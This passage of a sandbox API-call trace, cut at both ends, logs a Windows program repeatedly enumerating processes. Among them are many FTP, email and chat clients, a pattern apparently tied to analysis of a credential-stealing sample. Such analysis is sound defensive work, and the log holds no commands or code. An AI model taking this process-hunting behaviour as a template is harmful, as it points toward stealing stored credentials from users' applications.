th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0267.495] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0267.536] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0267.538] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0267.540] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0267.542] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0267.549] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0267.551] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0267.553] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0267.555] CloseHandle (hObject=0x9e0) returned 1 [0267.555] Sleep (dwMilliseconds=0x64) [0267.673] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0267.688] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.689] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0267.691] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0267.693] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.695] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0267.697] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.699] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0267.704] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0267.706] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0267.708] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.709] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.711] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0267.713] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.768] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.770] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.772] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.774] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.775] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.875] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.877] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0267.878] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0267.880] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0267.881] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.883] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0267.884] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0267.886] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0267.887] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0267.891] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.893] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0267.894] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0267.895] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0267.897] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0267.898] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0267.900] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0267.901] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0267.980] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0267.982] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0267.983] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0267.985] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0267.986] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0267.988] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0267.989] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0267.990] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0267.992] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0267.993] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0267.995] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0267.999] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0268.000] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0268.002] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0268.003] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0268.004] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0268.006] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0268.007] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0268.009] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0268.010] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0268.011] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0268.016] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0268.017] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0268.019] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0268.021] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0268.023] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0268.025] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0268.026] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0268.109] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0268.112] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0268.114] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0268.117] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0268.119] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0268.122] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0268.127] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0268.129] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0268.131] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0268.134] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0268.135] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 